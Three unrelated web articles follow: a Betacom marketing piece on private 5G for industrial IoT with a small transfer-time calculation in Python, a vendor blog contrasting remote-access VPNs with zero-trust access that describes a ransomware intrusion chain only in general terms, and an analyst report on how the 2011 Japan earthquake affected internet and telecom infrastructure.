Most of us confuse these terms because they’re so closely related. Wireless is the generic term for device connectivity using radio waves. It’s an umbrella term that covers cellular, Wi-Fi, and low power technologies like Bluetooth. Each method connects to these radio waves in slightly different ways. We’re going to concentrate on two of these – Wi-Fi and cellular – and try to simplify our definition. Think about how your various devices connect and consume data.
Let’s talk Wi-Fi first. Wi-Fi is a standard for short-distance wireless communication. It uses unlicensed spectrum that is shared by all Wi-Fi users, making it easy to access and cost-effective. Wi-Fi is available in most consumer devices, and the latest version of Wi-Fi, called Wi-Fi 6, can reach impressive speeds. The downside of Wi-Fi is actually caused by some of the same things that make it so great. Because it uses shared spectrum, and because so many devices use Wi-Fi, it can easily have interference issues or become congested. In an industrial IoT environment where business-critical applications need to work 100% of the time, Wi-Fi simply cannot be relied on.
Cellular connectivity generally comes from mobile carriers (AT&T, Verizon, T-Mobile) accessing radio waves via their vast network of cell towers. Because of their size and power, the range for cellular can be quite broad (cities, towns, etc.). Today’s cellular offerings are generally described as 4G and 5G. What’s the difference?
4G means the 4th generation of cellular technology. It was developed as smartphones like the first iPhone arrived with capabilities for data-intensive applications like video.
You’ll hear comparisons of each generation in terms of:
1) speed (simply how fast is the connection?)
2) bandwidth (how big is the figurative pipe feeding the connection?)
3) latency (what are the lags or delays in the connection?)
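A rough, back-of-the-envelope way to see how these three metrics interact: total transfer time is roughly one latency hit plus the payload size divided by throughput. The speed and latency figures below are assumed, illustrative numbers, not carrier measurements.

```python
def transfer_time_seconds(file_mbytes, speed_mbit_s, latency_ms):
    """Rough model: one round-trip latency hit plus payload over throughput."""
    payload_s = (file_mbytes * 8) / speed_mbit_s  # megabytes -> megabits
    return latency_ms / 1000 + payload_s


# Illustrative (assumed) figures for downloading a 50 MB video clip:
for label, speed_mbit_s, latency_ms in [("4G", 50, 50), ("5G", 1000, 10)]:
    t = transfer_time_seconds(50, speed_mbit_s, latency_ms)
    print(f"{label}: {t:.2f} s")
```

The model also shows why latency, not just raw speed, matters: for small payloads (a sensor reading, a control message) the latency term dominates the total, which is exactly where 5G's lower latency pays off for IIoT.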
Next-gen 5G cellular technology has been designed specifically for IIoT – to improve connectivity between billions of devices. It has the ability to deliver the sophisticated connectivity needed to safely accommodate autonomous vehicles, and to support data-intensive virtual reality applications. With 5G, the smart city of the future may be just around the corner with real-time surveillance for public safety, fast delivery of real-time medical data for connected health services, Artificial Intelligence to drive smart robots that learn as they operate – the list is truly endless. Blink twice and we’ll be talking about 6G and beyond.
Now, add to these tech-generations the concept of public or private networks and the questions regarding how you pay and who owns the data.
Public 5G vs. Private 5G
Public 5G is what you’re most likely familiar with from the news or TV commercials, where one mobile carrier claims that its 5G network is so much better than the others’. Verizon, AT&T and T-Mobile have spent billions of dollars in licensing to operate their cellular networks over very specific public-spectrum radio waves. They also recently spent millions more to upgrade their cell towers from 4G to 5G capabilities. The result is better coverage and higher speeds on your phones – especially if you’re outdoors where the radio signal is strong. The costs for these licenses and upgrades are, of course, passed along to you and me, the consumers.
So what about private 5G? While that network buildout was happening, the US government decided to set aside a big chunk of spectrum (radio waves) specifically for enterprise use (in many cases without needing a license) in order to foster business innovation. This is the foundation for private 5G.
Now, each enterprise can set up a network behind their private firewall, keeping access to the network and all their data secure. Parts of the network can be outdoors, like in a stadium or a warehouse yard, but the location is local and specific to the enterprise. Bandwidth and latency issues are minimized without any external interference. So private 5G networks leverage the advantages of wireless technology but in a controlled and secure environment that assures high reliability and low costs.
Private 5G networks enable these real-life advantages:
- Delivery of ultra-low latency connectivity with superior bandwidth, both indoors and in otherwise hard-to-reach places outdoors
- Coverage that is targeted, local and precise, enabling complex IIoT connectivity
- Mobility of connection that is perfect for automated guided vehicles and mobile robots
- Network configuration that can sit behind an enterprise firewall that keeps all data secure and in the company’s control
Now that we understand the tech-lingo better, let’s examine what is needed to implement IIoT, what planning is still in order and what obstacles we must overcome before we can begin to realize what’s possible.
Enabling Industry 4.0: What are the challenges?
Industry 4.0 is really just another buzzword for applying IIoT automation to industry. As we look at how to make that a reality, some challenges still exist. What are they, and how close are we to navigating our way around them?
Complexity of deployment
We talked about speed, bandwidth, and latency. The more devices we have to connect, the more complex the network solution needed to accommodate them. Which applications are business critical, and which are not (or less so)? What are the physical limitations of the equipment, the operating space, and the range of connectivity? For instance, IoT for fleet management may require maximum range capabilities.
This ‘Internet of everything’ we talk about doesn’t quite exist yet. Everything does NOT work in harmony. There may be obstacles connecting existing fixed equipment or sensors with other devices for environmental controls or predictive maintenance. Perhaps upgrades are available or can be budgeted for in the future – or can the legacy systems continue to work independently?
IoT sensors, set-up, connectivity
A thorough understanding of how IoT devices are set up must be put into the planning of an efficient network. For instance, warehouse sensors that read barcodes or RFIDs can’t function properly if there is interference of any kind. This could be caused by geography, physical space, storage racks, or moving elements like vehicles, humans, or mobile robots.
Cost and mindset for change
It’s one thing to imagine a perfect IIoT operation, and quite another to make it a reality. A lot of people and processes have to come together around a common goal to finance such investments. This may take years of planning and budgeting, which can be especially hard when the technology itself is changing so quickly. Yet when done right, integrating building and warehouse management solutions, for instance, can improve your bottom line for years to come. And the improved efficiency and safety of airports and factories can have a tremendous impact on cities and the economy.
Productivity and safety
Digital transformation makes the promise that industry will operate more productively. But people and machines can be at odds with each other. For instance, imagine an automated vehicle as a key component of your modern manufacturing production line. But what happens if a human gets in the way of the vehicle sensor? Will it be able to stop in time? Can the system handle the interruption in the workflow and recover in a safe yet efficient way? With more integration of automated devices and tools comes greater security risk — in more ways than one.
Data security and control
This brings us to cybersecurity, a hot topic for just about any business or industry. Enterprises cannot afford undue risk — to their intellectual property, their infrastructure, their assets, or their bottom line! Not only do you want to control access to data, devices, and applications, you want to own it. This is one way in which private 5G networks are ideal for IIoT, because, as we’ve mentioned, you own and control the network and your data. And think about it: the only topic possibly hotter than cybersecurity right now is big data. Data itself has become a valuable commodity to industry for what it can tell you, and how it can help you to forge the future of your business.
One last challenge to address is staffing — technical staffing, to be precise. So maybe you’re ready to build that perfect network and enable IIoT wireless technology. But how do you go about building it? It’s unlikely you have current staff who are well versed in IoT network management and infrastructure. Who manages it? Should you hire and train in-house staff, or find a provider who can build and manage it for you?
Putting private 5G at work in key industries
A few industry sectors are already finding ways to embrace IIoT through private 5G networks. Let’s talk about the best applications for each of these three front-runners.
Industry 4.0 is driving manufacturers to support factory floor robotics, devices like cameras and scanners, and a whole lot of data. Private 5G networks are finally able to offer a secure connection without interruption and at an affordable price. Early adopters in manufacturing include the automotive sector and those industries hoping to address recent supply chain and staffing issues that came to the fore with COVID. The IIoT use cases include predictive maintenance, modern automation, fleet management, machine learning, improved productivity, safety compliance, production scalability and flexibility. Here are some specifics:
IIoT technology can enable the accurate tracking and monitoring of everything from raw materials and tools through final production and shipment of goods.
Modern predictive maintenance devices help you to improve and maintain the health of your production line equipment with condition-based monitoring and artificial intelligence.
By integrating collaborative robotics into your production line, you can achieve a level of superior agility and precision previously unattainable with manual labor alone.
IIoT integration can provide employees access to systems and interfaces that deliver production controls, analytics, and a better understanding of what machines are doing — all for the well-oiled plant of the future.
Warehouses like those operated by Amazon and Walmart are offering new opportunities for jobs and growth in both urban and rural America. IIoT innovations have made these enterprises more expansive and complex, introducing new ways to improve inventory control, just-in-time delivery, and operations efficiency.
Smart warehousing needs more than accurate knowledge of what’s on the shelf. Modern IIoT inventory solutions address inventory tracking from supplier, to shelf, to truck and trailer routes and customer delivery.
Automated Guided Vehicles
Integrating automated vehicles with human-interface product picking and shipping operations can speed production efficiency.
Rugged Device Connectivity
IIoT network solutions can prioritize critical on-premises worker communications anywhere on the warehouse campus without interference to or from on-floor operational computers and equipment.
Airports were hit hard with COVID and are only starting to bounce back. And even before the pandemic, the challenge of delivering superior passenger experiences while also addressing operational efficiencies, security concerns and rising costs was top-of-mind for airlines and airports. IIoT connectivity has helped to address these industry-specific use cases above and below the wing:
Baggage and Cargo Handling
Automated asset tracking and scanners for baggage and cargo handling streamline airport and passenger operations from departure kiosks to destination arrival terminals.
Streamline Passenger Journey
With well-connected wayfinding, arrival and departure airline signage, ticketing kiosks and even retail operations, airport operations can be optimized for a streamlined, and touchless passenger experience.
Private networks allow IIoT devices to be integrated and delivered with optimal security. CCTV, security scanners, access control and even plane telemetry data and controls all work together to deliver safe domestic and international travel.
A roadmap to IIoT innovation
It’s obvious by now that private 5G is an important enabler of IIoT. But the road is not always clearly marked and easy to implement. Early adopters are paving the way for those who choose to follow. Are you one of them? Are you ready to embrace the possibilities of IIoT innovation in your enterprise? (For those ready to create an IIoT-ready network of your own, check out these resources: Your Private 5G Network Planning Checklist — for Warehouse and for Airports).
The good news: Scalability is built in.
With the right professionals to help you plan, design, and install a private 4G/5G network you’ll be able to scale as you grow. You can build a networking solution that meets the demands of your business now, and that also progressively enables future advanced technology as it becomes available. Managed service providers like Betacom can help.
And with 5G as a Service, Betacom will help you manage the daily operations of your network, backed 24x7x365 by their Security and Service Operations Center that address any and all connectivity and security issues, leaving your team free to focus on your business.
The time is now for Industry 4.0. And private 5G networks are enabling automation for ‘smart’ enterprises of the future. What are you waiting for? Get started with your 5G enabled IIoT operation now. Contact us.
To learn more about private 5G networks check out these resources: | <urn:uuid:149fda16-775d-418f-81e4-c51e16e167d4> | CC-MAIN-2024-38 | https://www.betacom.com/news/how-5g-enables-industrial-iot-wireless-technologies/ | 2024-09-13T08:58:43Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651510.65/warc/CC-MAIN-20240913070112-20240913100112-00392.warc.gz | en | 0.937379 | 3,130 | 3.015625 | 3 |
VPNs have gained widespread attention since 2018. YouTubers promote them as one of the safest tools for browsing the internet securely and anonymously. But while there are advantages to using a VPN, there are also disadvantages.
According to a Computer Weekly article, Travelex, a foreign exchange company, was recently hit by Sodinokibi ransomware, which ultimately disabled the company's IT systems on New Year's Eve. The attack took place after the company failed to patch its Pulse Secure VPN servers.
Unfortunately, it is becoming more of a common issue as VPNs are now a target of cybercriminals.
Outdated protocols lead to cyberattacks.
Back in the day, when remote access VPNs were necessary for a growing digital society, they were fantastic tools. The concept of remote access from anywhere in the world was game-changing. IT teams introduced VPNs at a time when most apps were running in the on-prem data centre, which was skilfully secured with a few network security appliances.
However, as the digital world grows ever faster, more internal apps have moved to the cloud. Remote access VPNs need servers to be exposed to the internet, and users must be moved onto the corporate network through static tunnels that punch holes through firewalls. Moreover, the same technology built to protect businesses and multinational corporations is now susceptible to modern malware and ransomware attacks.
But how does it happen?
Systematic cyberattacks that exploit vulnerable VPNs are becoming a common trend. Most recently, Medium.com published an article about the Sodinokibi ransomware incident and how it was carried out via a VPN. From that article, here are a few points that show the typical process for how malware can be introduced to a network through a VPN vulnerability:
- Cybercriminals use a technique where they scan the internet for unpatched VPN servers
- Remote access to the network is achieved (without needing a valid username and password)
- Attackers have the advantage of viewing logs and cached passwords in plain text
- Domain admin access is gained
- Subtle lateral movements take place across the entire network
- Multifactor authentication (MFA) and endpoint security are then disabled
- Ransomware (such as Sodinokibi) gets moved to network systems
- The company is then held to ransom
Negative effects of VPN
Many traditional organisations believe that remote-access VPNs are necessary. In some cases, they may very well be. But, often enough, VPNs are the gateway to opening networks to the internet, and as a result, there is an increased risk to most businesses. And here’s why:
- The patching process is often too slow or neglected - recalling and even allocating time to patch VPN servers is painstakingly difficult.
- Placing users on the network - For VPNs to work, networks must be discoverable. Unfortunately, this means that exposure to the internet opens the organisation to cyber attacks.
- Lateral risk at exponential scale - once on a network, malware can grow and spread laterally, regardless of efforts to perform network segmentation. Furthermore, this can lead to the takedown of other security technologies, for example MFA and endpoint security.
- The business' reputation - customers develop a sense of trust in a company based largely on how it manages their data. The ongoing widespread news of ransomware attacks poses a threat to the organisation and has a detrimental impact on the brand’s reputation.
A newer, safer approach
Since the negative impacts of VPNs have grown, new research has gone into finding alternative solutions. It has also been reported that, by the year 2023, 60% of enterprises will phase out most of their remote access virtual private networks (VPNs) in favour of zero-trust network access (ZTNA).
For businesses considering alternative methods, such as ZTNA, it is best to keep these points in mind when positioning it to your executive:
Reduce business risk - using ZTNA allows access to specific business applications without the need for network access, and no infrastructure is ever exposed. ZTNA removes the visibility of services and apps from the internet.
Reduce costs - aside from reducing business risk, ZTNA can also reduce cost. ZTNA is typically delivered as a fully cloud-based service, which means there are no servers to buy, patch, or manage – and this is not limited to just a VPN server. The entire VPN inbound gateway can now be smaller or removed altogether.
Deliver a better user experience - Given the increased availability of cloud ZTNA services compared to limited VPN inbound appliance gateways, remote users are given a faster and more seamless access experience regardless of application, device and even location.
If you are thinking about replacing your remote access VPN, then check out gend.co/netskope, we’d be happy to provide a full trial and demo to show you how to move from a VPN based service safely.
Want to stay ahead of the competition when it comes to security? Check out 10 Critical Security Projects and How Netskope Can Help. | <urn:uuid:a0df611a-6b33-4862-be78-00d92cdc2e21> | CC-MAIN-2024-38 | https://www.gend.co/blog/vpns-the-good-the-bad-and-the-ugly | 2024-09-14T15:27:37Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651579.38/warc/CC-MAIN-20240914125424-20240914155424-00292.warc.gz | en | 0.95881 | 1,089 | 2.8125 | 3 |
The 8.9-magnitude earthquake in Japan rocked the northeastern portion of the coast. The quake was the strongest to hit Japan in at least a century, sending a tsunami that flooded northern towns and also reached portions of the United States, including Hawaii. The quake was followed by a 7.1-magnitude aftershock.
Impact on Internet connectivity:
Japan’s Internet performance seems to have emerged largely unscathed, but concerns remain for the telecommunications infrastructure as the country struggles to meet power demands in a state of emergency. Internet intelligence firm Renesys revealed that only about 100 of the roughly 6,000 network prefixes routed out of Japan were temporarily out of service following the quake and tsunami. Other carriers around the region reported congestion and drops in traffic due to follow-on effects of the quake, but most websites are up and operational, and the Internet is available to support critical communications.
Another indication of the health of the Internet is traffic handled by the Japan Internet Exchange, which saw a 25Gb/s drop in traffic directly after the quake but this had picked up by the end of the day.
Overall traffic through another exchange point, JPNAP (a Layer 2 Internet exchange for large traffic volumes), registered a 10% drop from its historical rates of the previous two weeks, which suggests only minor impact.
What these statistics don’t show is the surge in traffic that follows any major event. So while the infrastructure is now delivering traditional traffic volumes, the fact there is apparently no spike in traffic usage is already an indication of some impact.
The situation may worsen however. Damage on Pacnet’s EAC cable and Pacific Crossing’s PC-1, (APCN2 is also confirmed as impacted) was the cause of the initial impact on Internet performance. Based on experience from the Taiwan quake, it is possible that lingering damage to fibers, repeaters, and landing station equipment may continue to generate new problems over the coming days and weeks, even in cable systems that survived the initial event. At present international and regional connectivity out of Japan remains intact.
Impact on telecommunications operators:
NTT East, which suffered the most damage, has raised the number of impacted lines from an initial count of 340,000 phone lines and 130,000 broadband fibre links to 879,500 phone lines and 475,400 fibre links. Further disruptions are expected due to ongoing power outages. So far, the number of impacted mobile base stations has remained around 11,000, but if power outages continue, there is a likelihood that others will fail as well as they run out of backup power.
Many of the major data centres in Japan have escaped damage. A round up of potential damage to data centres by ZDNet Japan found that most are operating normally, including those that are hosting cloud services. The only exception seems to be NTT Communications’ facilities in the Tohoku region, which are no longer online as the region has lost fibre and IP VPN connectivity.
The situation is vastly different from the 26 December 2006 earthquake off the coast of Taiwan, when up to 6 regional cable systems were damaged, resulting in widespread disruption to both business and Internet services in the region.
Social media and measures by operators to help:
Japan’s operators have all implemented measures to help its users share and distribute information following the earthquake. While phone lines were congested with callers seeking information from friends and family, Japan’s operators quickly set up other forms of communications to enable users to find critical information about family and friends. All four mobile operators—NTT DoCoMo, KDDI, Softbank and E-Mobile—set up dedicated messaging boards for users to share information instead of relying on voice calls. The four mobile operators also made available a service that allows users to check whether a particular phone number is still active and on the network.
NTT East, which operates the fixed line infrastructure in the worst hit regions, waived fees for public payphones in 17 prefectures. Google also made available its Person Finder application, first introduced following the New Zealand earthquake last month, as well as a dedicated crisis response site with the latest information on the situation in Japan.
Meanwhile, individual users are turning to social media sites such as Facebook and Twitter for information and communication. FON, a company which manages a large network of wi-fi hotspots, is opening up its 500,000 hotspots in Japan to web surfers for free until the country’s state of emergency comes to an end. Residents are posting videos of the quake on the CitizenTube channel on YouTube and using the service to reach out to friends and families across the world.
For information relating to the telecommunications market in Japan, see:
This post written by Lisa Hulme-Jones, BuddeComm Senior Analyst | <urn:uuid:a051c408-a7ea-4a7b-bb13-1775ecdcb733> | CC-MAIN-2024-38 | https://circleid.com/posts/20110316_quake_damage_in_japan | 2024-09-17T02:13:19Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651722.42/warc/CC-MAIN-20240917004428-20240917034428-00092.warc.gz | en | 0.953535 | 991 | 2.78125 | 3 |